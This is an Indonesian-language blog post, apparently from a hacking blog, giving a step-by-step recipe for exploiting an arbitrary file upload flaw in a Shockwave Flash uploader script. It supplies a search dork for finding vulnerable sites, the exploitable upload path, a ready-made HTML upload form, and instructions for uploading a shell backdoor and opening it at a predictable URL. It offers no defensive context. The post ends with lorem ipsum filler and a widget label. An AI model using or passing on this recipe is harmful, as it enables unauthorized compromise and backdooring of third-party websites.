Kamis, 10 Januari 2019

Shockwave Flash Arbitrary File Upload

Shockwave Flash Arbitary File Upload



Bahan bahan nya gan,

 Dorks : inurl:/ajax_general/ ext:php

-  Exploit : /ajax_general/swf-uploader/upload-maps-file.php

- Shell Backdoor

- CSRF : 
<form enctype="multipart/form-data" action="www.site.com/admin/content/ajax_general/swf-uploader/upload-maps-file.php" method="post"><input type="file" name="Filedata" multiple="multiple"><input type="submit" value="Upload"></form>
Ok simak ya gan,

1. Dorking duls


2. Kalo udah dapet target nya, abis itu kasih Exploit nya 

3. Ke CSRF nya buat upload shell

4. Kalo vuln bakal kek gini nih


Shell sudah terupload, akses shell? sudah tertara gan,

Example : www.example.com/file/$md5/shell.php

Sekian~ terimakasih 



Lorem ipsum is simply dummy text of the printing and typesetting industry.

This Is The Newest Post


EmoticonEmoticon